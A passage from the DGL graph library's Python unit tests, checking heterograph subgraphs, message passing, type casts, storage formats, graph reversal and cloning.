# TODO(minjie): enable this later
sg2 = g.edge_subgraph({'follows': np.array([1]),
'plays': np.array([1]),
'wishes': np.array([1])})
_check_subgraph(g, sg2)
def _check_subgraph_single_ntype(g, sg, preserve_nodes=False):
assert sg.idtype == g.idtype
assert sg.device == g.device
assert sg.ntypes == g.ntypes
assert sg.etypes == g.etypes
assert sg.canonical_etypes == g.canonical_etypes
if not preserve_nodes:
assert F.array_equal(F.tensor(sg.nodes['user'].data[dgl.NID]),
F.tensor([1, 2], g.idtype))
else:
for ntype in sg.ntypes:
assert g.number_of_nodes(ntype) == sg.number_of_nodes(ntype)
assert F.array_equal(F.tensor(sg.edges['follows'].data[dgl.EID]),
F.tensor([1], g.idtype))
if not preserve_nodes:
assert F.array_equal(sg.nodes['user'].data['h'], g.nodes['user'].data['h'][1:3])
assert F.array_equal(sg.edges['follows'].data['h'], g.edges['follows'].data['h'][1:2])
def _check_subgraph_single_etype(g, sg, preserve_nodes=False):
assert sg.ntypes == g.ntypes
assert sg.etypes == g.etypes
assert sg.canonical_etypes == g.canonical_etypes
if not preserve_nodes:
assert F.array_equal(F.tensor(sg.nodes['user'].data[dgl.NID]),
F.tensor([0, 1], g.idtype))
assert F.array_equal(F.tensor(sg.nodes['game'].data[dgl.NID]),
F.tensor([0], g.idtype))
else:
for ntype in sg.ntypes:
assert g.number_of_nodes(ntype) == sg.number_of_nodes(ntype)
assert F.array_equal(F.tensor(sg.edges['plays'].data[dgl.EID]),
F.tensor([0, 1], g.idtype))
sg1_graph = g_graph.subgraph([1, 2])
_check_subgraph_single_ntype(g_graph, sg1_graph)
if F._default_context_str != 'gpu':
# TODO(minjie): enable this later
sg1_graph = g_graph.edge_subgraph([1])
_check_subgraph_single_ntype(g_graph, sg1_graph)
sg1_graph = g_graph.edge_subgraph([1], relabel_nodes=False)
_check_subgraph_single_ntype(g_graph, sg1_graph, True)
sg2_bipartite = g_bipartite.edge_subgraph([0, 1])
_check_subgraph_single_etype(g_bipartite, sg2_bipartite)
sg2_bipartite = g_bipartite.edge_subgraph([0, 1], relabel_nodes=False)
_check_subgraph_single_etype(g_bipartite, sg2_bipartite, True)
def _check_typed_subgraph1(g, sg):
assert g.idtype == sg.idtype
assert g.device == sg.device
assert set(sg.ntypes) == {'user', 'game'}
assert set(sg.etypes) == {'follows', 'plays', 'wishes'}
for ntype in sg.ntypes:
assert sg.number_of_nodes(ntype) == g.number_of_nodes(ntype)
for etype in sg.etypes:
src_sg, dst_sg = sg.all_edges(etype=etype, order='eid')
src_g, dst_g = g.all_edges(etype=etype, order='eid')
assert F.array_equal(src_sg, src_g)
assert F.array_equal(dst_sg, dst_g)
assert F.array_equal(sg.nodes['user'].data['h'], g.nodes['user'].data['h'])
assert F.array_equal(sg.edges['follows'].data['h'], g.edges['follows'].data['h'])
g.nodes['user'].data['h'] = F.scatter_row(g.nodes['user'].data['h'], F.tensor([2]), F.randn((1, 5)))
g.edges['follows'].data['h'] = F.scatter_row(g.edges['follows'].data['h'], F.tensor([1]), F.randn((1, 4)))
assert F.array_equal(sg.nodes['user'].data['h'], g.nodes['user'].data['h'])
assert F.array_equal(sg.edges['follows'].data['h'], g.edges['follows'].data['h'])
def _check_typed_subgraph2(g, sg):
assert set(sg.ntypes) == {'developer', 'game'}
assert set(sg.etypes) == {'develops'}
for ntype in sg.ntypes:
assert sg.number_of_nodes(ntype) == g.number_of_nodes(ntype)
for etype in sg.etypes:
src_sg, dst_sg = sg.all_edges(etype=etype, order='eid')
src_g, dst_g = g.all_edges(etype=etype, order='eid')
assert F.array_equal(src_sg, src_g)
assert F.array_equal(dst_sg, dst_g)
sg3 = g.node_type_subgraph(['user', 'game'])
_check_typed_subgraph1(g, sg3)
sg4 = g.edge_type_subgraph(['develops'])
_check_typed_subgraph2(g, sg4)
sg5 = g.edge_type_subgraph(['follows', 'plays', 'wishes'])
_check_typed_subgraph1(g, sg5)
@parametrize_dtype
def test_apply(idtype):
def node_udf(nodes):
return {'h': nodes.data['h'] * 2}
def node_udf2(nodes):
return {'h': F.sum(nodes.data['h'], dim=1, keepdims=True)}
def edge_udf(edges):
return {'h': edges.data['h'] * 2 + edges.src['h']}
g = create_test_heterograph(idtype)
g.nodes['user'].data['h'] = F.ones((3, 5))
g.apply_nodes(node_udf, ntype='user')
assert F.array_equal(g.nodes['user'].data['h'], F.ones((3, 5)) * 2)
g['plays'].edata['h'] = F.ones((4, 5))
g.apply_edges(edge_udf, etype=('user', 'plays', 'game'))
assert F.array_equal(g['plays'].edata['h'], F.ones((4, 5)) * 4)
# test apply on graph with only one type
g['follows'].apply_nodes(node_udf)
assert F.array_equal(g.nodes['user'].data['h'], F.ones((3, 5)) * 4)
g['plays'].apply_edges(edge_udf)
assert F.array_equal(g['plays'].edata['h'], F.ones((4, 5)) * 12)
# Test the case that feature size changes
g.nodes['user'].data['h'] = F.ones((3, 5))
g.apply_nodes(node_udf2, ntype='user')
assert F.array_equal(g.nodes['user'].data['h'], F.ones((3, 1)) * 5)
# test fail case
# fail due to multiple types
with pytest.raises(DGLError):
g.apply_nodes(node_udf)
with pytest.raises(DGLError):
g.apply_edges(edge_udf)
@parametrize_dtype
def test_level2(idtype):
#edges = {
# 'follows': ([0, 1], [1, 2]),
# 'plays': ([0, 1, 2, 1], [0, 0, 1, 1]),
# 'wishes': ([0, 2], [1, 0]),
# 'develops': ([0, 1], [0, 1]),
#}
g = create_test_heterograph(idtype)
def rfunc(nodes):
return {'y': F.sum(nodes.mailbox['m'], 1)}
def rfunc2(nodes):
return {'y': F.max(nodes.mailbox['m'], 1)}
def mfunc(edges):
return {'m': edges.src['h']}
def afunc(nodes):
return {'y' : nodes.data['y'] + 1}
#############################################################
# send_and_recv
#############################################################
g.nodes['user'].data['h'] = F.ones((3, 2))
g.send_and_recv([2, 3], mfunc, rfunc, etype='plays')
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[0., 0.], [2., 2.]]))
# only one type
g['plays'].send_and_recv([2, 3], mfunc, rfunc)
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[0., 0.], [2., 2.]]))
# test fail case
# fail due to multiple types
with pytest.raises(DGLError):
g.send_and_recv([2, 3], mfunc, rfunc)
g.nodes['game'].data.clear()
#############################################################
# pull
#############################################################
g.nodes['user'].data['h'] = F.ones((3, 2))
g.pull(1, mfunc, rfunc, etype='plays')
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[0., 0.], [2., 2.]]))
# only one type
g['plays'].pull(1, mfunc, rfunc)
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[0., 0.], [2., 2.]]))
# test fail case
with pytest.raises(DGLError):
g.pull(1, mfunc, rfunc)
g.nodes['game'].data.clear()
#############################################################
# update_all
#############################################################
g.nodes['user'].data['h'] = F.ones((3, 2))
g.update_all(mfunc, rfunc, etype='plays')
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[2., 2.], [2., 2.]]))
# only one type
g['plays'].update_all(mfunc, rfunc)
y = g.nodes['game'].data['y']
assert F.array_equal(y, F.tensor([[2., 2.], [2., 2.]]))
# test fail case
# fail due to multiple types
with pytest.raises(DGLError):
g.update_all(mfunc, rfunc)
# test multi
g.multi_update_all(
{'plays' : (mfunc, rfunc),
('user', 'wishes', 'game'): (mfunc, rfunc2)},
'sum')
assert F.array_equal(g.nodes['game'].data['y'], F.tensor([[3., 3.], [3., 3.]]))
# test multi
g.multi_update_all(
{'plays' : (mfunc, rfunc, afunc),
('user', 'wishes', 'game'): (mfunc, rfunc2)},
'sum', afunc)
assert F.array_equal(g.nodes['game'].data['y'], F.tensor([[5., 5.], [5., 5.]]))
# test cross reducer
g.nodes['user'].data['h'] = F.randn((3, 2))
for cred in ['sum', 'max', 'min', 'mean', 'stack']:
g.multi_update_all(
{'plays' : (mfunc, rfunc, afunc),
'wishes': (mfunc, rfunc2)},
cred, afunc)
y = g.nodes['game'].data['y']
g['plays'].update_all(mfunc, rfunc, afunc)
y1 = g.nodes['game'].data['y']
g['wishes'].update_all(mfunc, rfunc2)
y2 = g.nodes['game'].data['y']
if cred == 'stack':
# stack has an internal order by edge type id
yy = F.stack([y1, y2], 1)
yy = yy + 1 # final afunc
assert F.array_equal(y, yy)
else:
yy = get_redfn(cred)(F.stack([y1, y2], 0), 0)
yy = yy + 1 # final afunc
assert F.array_equal(y, yy)
# test fail case
# fail because cannot infer ntype
with pytest.raises(DGLError):
g.update_all(
{'plays' : (mfunc, rfunc),
'follows': (mfunc, rfunc2)},
'sum')
g.nodes['game'].data.clear()
@parametrize_dtype
@unittest.skipIf(F._default_context_str == 'cpu', reason="Need gpu for this test")
def test_more_nnz(idtype):
g = dgl.graph(([0, 0, 0, 0, 0], [1, 1, 1, 1, 1]), idtype=idtype, device=F.ctx())
g.ndata['x'] = F.copy_to(F.ones((2, 5)), ctx=F.ctx())
g.update_all(fn.copy_u('x', 'm'), fn.sum('m', 'y'))
y = g.ndata['y']
ans = np.zeros((2, 5))
ans[1] = 5
ans = F.copy_to(F.tensor(ans, dtype=F.dtype(y)), ctx=F.ctx())
assert F.array_equal(y, ans)
@parametrize_dtype
def test_updates(idtype):
def msg_func(edges):
return {'m': edges.src['h']}
def reduce_func(nodes):
return {'y': F.sum(nodes.mailbox['m'], 1)}
def apply_func(nodes):
return {'y': nodes.data['y'] * 2}
g = create_test_heterograph(idtype)
x = F.randn((3, 5))
g.nodes['user'].data['h'] = x
for msg, red, apply in itertools.product(
[fn.copy_u('h', 'm'), msg_func], [fn.sum('m', 'y'), reduce_func],
[None, apply_func]):
multiplier = 1 if apply is None else 2
g['user', 'plays', 'game'].update_all(msg, red, apply)
y = g.nodes['game'].data['y']
assert F.array_equal(y[0], (x[0] + x[1]) * multiplier)
assert F.array_equal(y[1], (x[1] + x[2]) * multiplier)
del g.nodes['game'].data['y']
g['user', 'plays', 'game'].send_and_recv(([0, 1, 2], [0, 1, 1]), msg, red, apply)
y = g.nodes['game'].data['y']
assert F.array_equal(y[0], x[0] * multiplier)
assert F.array_equal(y[1], (x[1] + x[2]) * multiplier)
del g.nodes['game'].data['y']
# pulls from destination (game) node 0
g['user', 'plays', 'game'].pull(0, msg, red, apply)
y = g.nodes['game'].data['y']
assert F.array_equal(y[0], (x[0] + x[1]) * multiplier)
del g.nodes['game'].data['y']
# pushes from source (user) node 0
g['user', 'plays', 'game'].push(0, msg, red, apply)
y = g.nodes['game'].data['y']
assert F.array_equal(y[0], x[0] * multiplier)
del g.nodes['game'].data['y']
@parametrize_dtype
def test_backward(idtype):
g = create_test_heterograph(idtype)
x = F.randn((3, 5))
F.attach_grad(x)
g.nodes['user'].data['h'] = x
with F.record_grad():
g.multi_update_all(
{'plays' : (fn.copy_u('h', 'm'), fn.sum('m', 'y')),
'wishes': (fn.copy_u('h', 'm'), fn.sum('m', 'y'))},
'sum')
y = g.nodes['game'].data['y']
F.backward(y, F.ones(y.shape))
print(F.grad(x))
assert F.array_equal(F.grad(x), F.tensor([[2., 2., 2., 2., 2.],
[2., 2., 2., 2., 2.],
[2., 2., 2., 2., 2.]]))
@parametrize_dtype
def test_empty_heterograph(idtype):
def assert_empty(g):
assert g.number_of_nodes('user') == 0
assert g.number_of_edges('plays') == 0
assert g.number_of_nodes('game') == 0
# empty src-dst pair
assert_empty(dgl.heterograph({('user', 'plays', 'game'): ([], [])}))
g = dgl.heterograph({('user', 'follows', 'user'): ([], [])}, idtype=idtype, device=F.ctx())
assert g.idtype == idtype
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 0
assert g.number_of_edges('follows') == 0
# empty relation graph with others
g = dgl.heterograph({('user', 'plays', 'game'): ([], []), ('developer', 'develops', 'game'):
([0, 1], [0, 1])}, idtype=idtype, device=F.ctx())
assert g.idtype == idtype
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 0
assert g.number_of_edges('plays') == 0
assert g.number_of_nodes('game') == 2
assert g.number_of_edges('develops') == 2
assert g.number_of_nodes('developer') == 2
@parametrize_dtype
def test_types_in_function(idtype):
def mfunc1(edges):
assert edges.canonical_etype == ('user', 'follow', 'user')
return {}
def rfunc1(nodes):
assert nodes.ntype == 'user'
return {}
def filter_nodes1(nodes):
assert nodes.ntype == 'user'
return F.zeros((3,))
def filter_edges1(edges):
assert edges.canonical_etype == ('user', 'follow', 'user')
return F.zeros((2,))
def mfunc2(edges):
assert edges.canonical_etype == ('user', 'plays', 'game')
return {}
def rfunc2(nodes):
assert nodes.ntype == 'game'
return {}
def filter_nodes2(nodes):
assert nodes.ntype == 'game'
return F.zeros((3,))
def filter_edges2(edges):
assert edges.canonical_etype == ('user', 'plays', 'game')
return F.zeros((2,))
g = dgl.heterograph({('user', 'follow', 'user'): ((0, 1), (1, 2))},
idtype=idtype, device=F.ctx())
g.apply_nodes(rfunc1)
g.apply_edges(mfunc1)
g.update_all(mfunc1, rfunc1)
g.send_and_recv([0, 1], mfunc1, rfunc1)
g.push([0], mfunc1, rfunc1)
g.pull([1], mfunc1, rfunc1)
g.filter_nodes(filter_nodes1)
g.filter_edges(filter_edges1)
g = dgl.heterograph({('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
g.apply_nodes(rfunc2, ntype='game')
g.apply_edges(mfunc2)
g.update_all(mfunc2, rfunc2)
g.send_and_recv([0, 1], mfunc2, rfunc2)
g.push([0], mfunc2, rfunc2)
g.pull([1], mfunc2, rfunc2)
g.filter_nodes(filter_nodes2, ntype='game')
g.filter_edges(filter_edges2)
@parametrize_dtype
def test_stack_reduce(idtype):
#edges = {
# 'follows': ([0, 1], [1, 2]),
# 'plays': ([0, 1, 2, 1], [0, 0, 1, 1]),
# 'wishes': ([0, 2], [1, 0]),
# 'develops': ([0, 1], [0, 1]),
#}
g = create_test_heterograph(idtype)
g.nodes['user'].data['h'] = F.randn((3, 200))
def rfunc(nodes):
return {'y': F.sum(nodes.mailbox['m'], 1)}
def rfunc2(nodes):
return {'y': F.max(nodes.mailbox['m'], 1)}
def mfunc(edges):
return {'m': edges.src['h']}
g.multi_update_all(
{'plays' : (mfunc, rfunc),
'wishes': (mfunc, rfunc2)},
'stack')
assert g.nodes['game'].data['y'].shape == (g.number_of_nodes('game'), 2, 200)
# only one type-wise update_all, stack still adds one dimension
g.multi_update_all(
{'plays' : (mfunc, rfunc)},
'stack')
assert g.nodes['game'].data['y'].shape == (g.number_of_nodes('game'), 1, 200)
@parametrize_dtype
def test_isolated_ntype(idtype):
g = dgl.heterograph({
('A', 'AB', 'B'): ([0, 1, 2], [1, 2, 3])},
num_nodes_dict={'A': 3, 'B': 4, 'C': 4},
idtype=idtype, device=F.ctx())
assert g.number_of_nodes('A') == 3
assert g.number_of_nodes('B') == 4
assert g.number_of_nodes('C') == 4
g = dgl.heterograph({
('A', 'AC', 'C'): ([0, 1, 2], [1, 2, 3])},
num_nodes_dict={'A': 3, 'B': 4, 'C': 4},
idtype=idtype, device=F.ctx())
assert g.number_of_nodes('A') == 3
assert g.number_of_nodes('B') == 4
assert g.number_of_nodes('C') == 4
G = dgl.graph(([0, 1, 2], [4, 5, 6]), num_nodes=11, idtype=idtype, device=F.ctx())
G.ndata[dgl.NTYPE] = F.tensor([0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2], dtype=F.int64)
G.edata[dgl.ETYPE] = F.tensor([0, 0, 0], dtype=F.int64)
g = dgl.to_heterogeneous(G, ['A', 'B', 'C'], ['AB'])
assert g.number_of_nodes('A') == 3
assert g.number_of_nodes('B') == 4
assert g.number_of_nodes('C') == 4
@parametrize_dtype
def test_ismultigraph(idtype):
g1 = dgl.heterograph({('A', 'AB', 'B'): ([0, 0, 1, 2], [1, 2, 5, 5])},
{'A': 6, 'B': 6}, idtype=idtype, device=F.ctx())
assert g1.is_multigraph == False
g2 = dgl.heterograph({('A', 'AC', 'C'): ([0, 0, 0, 1], [1, 1, 2, 5])},
{'A': 6, 'C': 6}, idtype=idtype, device=F.ctx())
assert g2.is_multigraph == True
g3 = dgl.graph(((0, 1), (1, 2)), num_nodes=6, idtype=idtype, device=F.ctx())
assert g3.is_multigraph == False
g4 = dgl.graph(([0, 0, 1], [1, 1, 2]), num_nodes=6, idtype=idtype, device=F.ctx())
assert g4.is_multigraph == True
g = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1, 2], [1, 2, 5, 5]),
('A', 'AA', 'A'): ([0, 1], [1, 2])},
{'A': 6, 'B': 6}, idtype=idtype, device=F.ctx())
assert g.is_multigraph == False
g = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1, 2], [1, 2, 5, 5]),
('A', 'AC', 'C'): ([0, 0, 0, 1], [1, 1, 2, 5])},
{'A': 6, 'B': 6, 'C': 6}, idtype=idtype, device=F.ctx())
assert g.is_multigraph == True
g = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1, 2], [1, 2, 5, 5]),
('A', 'AA', 'A'): ([0, 0, 1], [1, 1, 2])},
{'A': 6, 'B': 6}, idtype=idtype, device=F.ctx())
assert g.is_multigraph == True
g = dgl.heterograph({
('A', 'AC', 'C'): ([0, 0, 0, 1], [1, 1, 2, 5]),
('A', 'AA', 'A'): ([0, 1], [1, 2])},
{'A': 6, 'C': 6}, idtype=idtype, device=F.ctx())
assert g.is_multigraph == True
@parametrize_dtype
def test_bipartite(idtype):
g1 = dgl.heterograph({('A', 'AB', 'B'): ([0, 0, 1], [1, 2, 5])},
idtype=idtype, device=F.ctx())
assert g1.is_unibipartite
assert len(g1.ntypes) == 2
assert g1.etypes == ['AB']
assert g1.srctypes == ['A']
assert g1.dsttypes == ['B']
assert g1.number_of_nodes('A') == 2
assert g1.number_of_nodes('B') == 6
assert g1.number_of_src_nodes('A') == 2
assert g1.number_of_src_nodes() == 2
assert g1.number_of_dst_nodes('B') == 6
assert g1.number_of_dst_nodes() == 6
assert g1.number_of_edges() == 3
g1.srcdata['h'] = F.randn((2, 5))
assert F.array_equal(g1.srcnodes['A'].data['h'], g1.srcdata['h'])
assert F.array_equal(g1.nodes['A'].data['h'], g1.srcdata['h'])
assert F.array_equal(g1.nodes['SRC/A'].data['h'], g1.srcdata['h'])
g1.dstdata['h'] = F.randn((6, 3))
assert F.array_equal(g1.dstnodes['B'].data['h'], g1.dstdata['h'])
assert F.array_equal(g1.nodes['B'].data['h'], g1.dstdata['h'])
assert F.array_equal(g1.nodes['DST/B'].data['h'], g1.dstdata['h'])
# more complicated bipartite
g2 = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1], [1, 2, 5]),
('A', 'AC', 'C'): ([1, 0], [0, 0])
}, idtype=idtype, device=F.ctx())
assert g2.is_unibipartite
assert g2.srctypes == ['A']
assert set(g2.dsttypes) == {'B', 'C'}
assert g2.number_of_nodes('A') == 2
assert g2.number_of_nodes('B') == 6
assert g2.number_of_nodes('C') == 1
assert g2.number_of_src_nodes('A') == 2
assert g2.number_of_src_nodes() == 2
assert g2.number_of_dst_nodes('B') == 6
assert g2.number_of_dst_nodes('C') == 1
g2.srcdata['h'] = F.randn((2, 5))
assert F.array_equal(g2.srcnodes['A'].data['h'], g2.srcdata['h'])
assert F.array_equal(g2.nodes['A'].data['h'], g2.srcdata['h'])
assert F.array_equal(g2.nodes['SRC/A'].data['h'], g2.srcdata['h'])
g3 = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1], [1, 2, 5]),
('A', 'AC', 'C'): ([1, 0], [0, 0]),
('A', 'AA', 'A'): ([0, 1], [0, 1])
}, idtype=idtype, device=F.ctx())
assert not g3.is_unibipartite
g4 = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1], [1, 2, 5]),
('C', 'CA', 'A'): ([1, 0], [0, 0])
}, idtype=idtype, device=F.ctx())
assert not g4.is_unibipartite
@parametrize_dtype
def test_dtype_cast(idtype):
g = dgl.graph(([0, 1, 0, 2], [0, 1, 1, 0]), idtype=idtype, device=F.ctx())
assert g.idtype == idtype
g.ndata["feat"] = F.tensor([3, 4, 5])
g.edata["h"] = F.tensor([3, 4, 5, 6])
if idtype == "int32":
g_cast = g.long()
assert g_cast.idtype == F.int64
else:
g_cast = g.int()
assert g_cast.idtype == F.int32
test_utils.check_graph_equal(g, g_cast, check_idtype=False)
def test_float_cast():
for t in [F.float16, F.float32, F.float64]:
idtype = F.int32
g = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([0, 1, 1, 2, 2, 3], dtype=idtype),
F.tensor([0, 0, 1, 1, 2, 2], dtype=idtype)),
('user', 'plays', 'game'): (F.tensor([0, 1, 1], dtype=idtype),
F.tensor([0, 0, 1], dtype=idtype))},
idtype=idtype, device=F.ctx())
uvalues = [1, 2, 3, 4]
gvalues = [5, 6]
fvalues = [7, 8, 9, 10, 11, 12]
pvalues = [13, 14, 15]
dataNamesTypes = [
('a',F.float16),
('b',F.float32),
('c',F.float64),
('d',F.int32),
('e',F.int64)]
for name,type in dataNamesTypes:
g.nodes['user'].data[name] = F.copy_to(F.tensor(uvalues, dtype=type), ctx=F.ctx())
for name,type in dataNamesTypes:
g.nodes['game'].data[name] = F.copy_to(F.tensor(gvalues, dtype=type), ctx=F.ctx())
for name,type in dataNamesTypes:
g.edges['follows'].data[name] = F.copy_to(F.tensor(fvalues, dtype=type), ctx=F.ctx())
for name,type in dataNamesTypes:
g.edges['plays'].data[name] = F.copy_to(F.tensor(pvalues, dtype=type), ctx=F.ctx())
if t == F.float16:
g = dgl.transforms.functional.to_half(g)
if t == F.float32:
g = dgl.transforms.functional.to_float(g)
if t == F.float64:
g = dgl.transforms.functional.to_double(g)
for name,origType in dataNamesTypes:
# integer tensors shouldn't be converted
reqType = t if (origType in [F.float16,F.float32,F.float64]) else origType
values = g.nodes['user'].data[name]
assert values.dtype == reqType
assert len(values) == len(uvalues)
assert F.allclose(values, F.tensor(uvalues), 0, 0)
values = g.nodes['game'].data[name]
assert values.dtype == reqType
assert len(values) == len(gvalues)
assert F.allclose(values, F.tensor(gvalues), 0, 0)
values = g.edges['follows'].data[name]
assert values.dtype == reqType
assert len(values) == len(fvalues)
assert F.allclose(values, F.tensor(fvalues), 0, 0)
values = g.edges['plays'].data[name]
assert values.dtype == reqType
assert len(values) == len(pvalues)
assert F.allclose(values, F.tensor(pvalues), 0, 0)
@parametrize_dtype
def test_format(idtype):
# single relation
g = dgl.graph(([0, 1, 0, 2], [0, 1, 1, 0]), idtype=idtype, device=F.ctx())
assert g.formats()['created'] == ['coo']
g1 = g.formats(['coo', 'csr', 'csc'])
assert len(g1.formats()['created']) + len(g1.formats()['not created']) == 3
g1.create_formats_()
assert len(g1.formats()['created']) == 3
assert g.formats()['created'] == ['coo']
# multiple relation
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1], [1, 2]),
('user', 'plays', 'game'): ([0, 1, 1, 2], [0, 0, 1, 1]),
('developer', 'develops', 'game'): ([0, 1], [0, 1])
}, idtype=idtype, device=F.ctx())
user_feat = F.randn((g['follows'].number_of_src_nodes(), 5))
g['follows'].srcdata['h'] = user_feat
g1 = g.formats('csc')
# test frame
assert F.array_equal(g1['follows'].srcdata['h'], user_feat)
# test each relation graph
assert g1.formats()['created'] == ['csc']
assert len(g1.formats()['not created']) == 0
# in_degrees
g = dgl.rand_graph(100, 2340).to(F.ctx())
ind_arr = []
for vid in range(0, 100):
ind_arr.append(g.in_degrees(vid))
in_degrees = g.in_degrees()
g = g.formats('coo')
for vid in range(0, 100):
assert g.in_degrees(vid) == ind_arr[vid]
assert F.array_equal(in_degrees, g.in_degrees())
@parametrize_dtype
def test_edges_order(idtype):
# (0, 2), (1, 2), (0, 1), (0, 1), (2, 1)
g = dgl.graph((
np.array([0, 1, 0, 0, 2]),
np.array([2, 2, 1, 1, 1])
), idtype=idtype, device=F.ctx())
print(g.formats())
src, dst = g.all_edges(order='srcdst')
assert F.array_equal(src, F.tensor([0, 0, 0, 1, 2], dtype=idtype))
assert F.array_equal(dst, F.tensor([1, 1, 2, 2, 1], dtype=idtype))
@parametrize_dtype
def test_reverse(idtype):
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1, 2, 4, 3 ,1, 3], [1, 2, 3, 2, 0, 0, 1]),
}, idtype=idtype, device=F.ctx())
gidx = g._graph
r_gidx = gidx.reverse()
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
# force to start with 'csr'
gidx = gidx.formats('csr')
gidx = gidx.formats(['coo', 'csr', 'csc'])
r_gidx = gidx.reverse()
assert 'csr' in gidx.formats()['created']
assert 'csc' in r_gidx.formats()['created']
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
# force to start with 'csc'
gidx = gidx.formats('csc')
gidx = gidx.formats(['coo', 'csr', 'csc'])
r_gidx = gidx.reverse()
assert 'csc' in gidx.formats()['created']
assert 'csr' in r_gidx.formats()['created']
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1, 2, 4, 3 ,1, 3], [1, 2, 3, 2, 0, 0, 1]),
('user', 'plays', 'game'): ([0, 0, 2, 3, 3, 4, 1], [1, 0, 1, 0, 1, 0, 0]),
('developer', 'develops', 'game'): ([0, 1, 1, 2], [0, 0, 1, 1]),
}, idtype=idtype, device=F.ctx())
gidx = g._graph
r_gidx = gidx.reverse()
# metagraph
mg = gidx.metagraph
r_mg = r_gidx.metagraph
for etype in range(3):
assert mg.find_edge(etype) == r_mg.find_edge(etype)[::-1]
# three node types and three edge types
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_nodes(1) == r_gidx.number_of_nodes(1)
assert gidx.number_of_nodes(2) == r_gidx.number_of_nodes(2)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
assert gidx.number_of_edges(1) == r_gidx.number_of_edges(1)
assert gidx.number_of_edges(2) == r_gidx.number_of_edges(2)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(1)
rg_s, rg_d, _ = r_gidx.edges(1)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(2)
rg_s, rg_d, _ = r_gidx.edges(2)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
# force to start with 'csr'
gidx = gidx.formats('csr')
gidx = gidx.formats(['coo', 'csr', 'csc'])
r_gidx = gidx.reverse()
# three node types and three edge types
assert 'csr' in gidx.formats()['created']
assert 'csc' in r_gidx.formats()['created']
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_nodes(1) == r_gidx.number_of_nodes(1)
assert gidx.number_of_nodes(2) == r_gidx.number_of_nodes(2)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
assert gidx.number_of_edges(1) == r_gidx.number_of_edges(1)
assert gidx.number_of_edges(2) == r_gidx.number_of_edges(2)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(1)
rg_s, rg_d, _ = r_gidx.edges(1)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(2)
rg_s, rg_d, _ = r_gidx.edges(2)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
# force to start with 'csc'
gidx = gidx.formats('csc')
gidx = gidx.formats(['coo', 'csr', 'csc'])
r_gidx = gidx.reverse()
# three node types and three edge types
assert 'csc' in gidx.formats()['created']
assert 'csr' in r_gidx.formats()['created']
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_nodes(1) == r_gidx.number_of_nodes(1)
assert gidx.number_of_nodes(2) == r_gidx.number_of_nodes(2)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
assert gidx.number_of_edges(1) == r_gidx.number_of_edges(1)
assert gidx.number_of_edges(2) == r_gidx.number_of_edges(2)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(1)
rg_s, rg_d, _ = r_gidx.edges(1)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(2)
rg_s, rg_d, _ = r_gidx.edges(2)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
@parametrize_dtype
def test_clone(idtype):
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([1, 1, 1], dtype=idtype), ctx=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([1, 1], dtype=idtype), ctx=F.ctx())
new_g = g.clone()
assert g.number_of_nodes() == new_g.number_of_nodes()
